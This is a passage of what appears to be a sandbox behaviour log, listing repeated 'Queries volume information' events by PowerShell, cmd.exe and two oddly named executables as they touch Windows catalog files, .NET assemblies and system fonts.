Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Queries volume information: C:\Bridgecontainerserver\BrokerhostNet.exe VolumeInformation
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Queries volume information: C:\Bridgecontainerserver\BrokerhostNet.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
